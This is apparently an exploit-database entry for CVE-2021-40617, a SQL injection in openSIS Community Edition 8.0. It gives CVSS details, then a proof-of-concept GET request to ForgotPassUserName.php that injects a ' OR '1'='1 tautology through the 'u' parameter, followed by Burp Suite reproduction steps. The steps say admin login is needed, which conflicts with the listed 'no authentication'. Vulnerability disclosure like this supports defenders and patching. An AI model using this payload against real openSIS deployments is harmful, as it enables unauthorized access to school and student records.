openSIS Community Edition 8.0 SQL Injection

2025.12.21

Credit: CodeSecLab

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2021-40617

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Exploit Title: openSIS Community Edition 8.0 - SQL Injection 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OS4ED/openSIS-Classic
# Software Link: https://github.com/OS4ED/openSIS-Classic
# Version: 8.0 
# Tested on: Windows
# CVE : CVE-2021-40617


Proof Of Concept
GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1
Host: opensis
Connection: close



Steps to Reproduce
Login as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

openSIS Community Edition 8.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.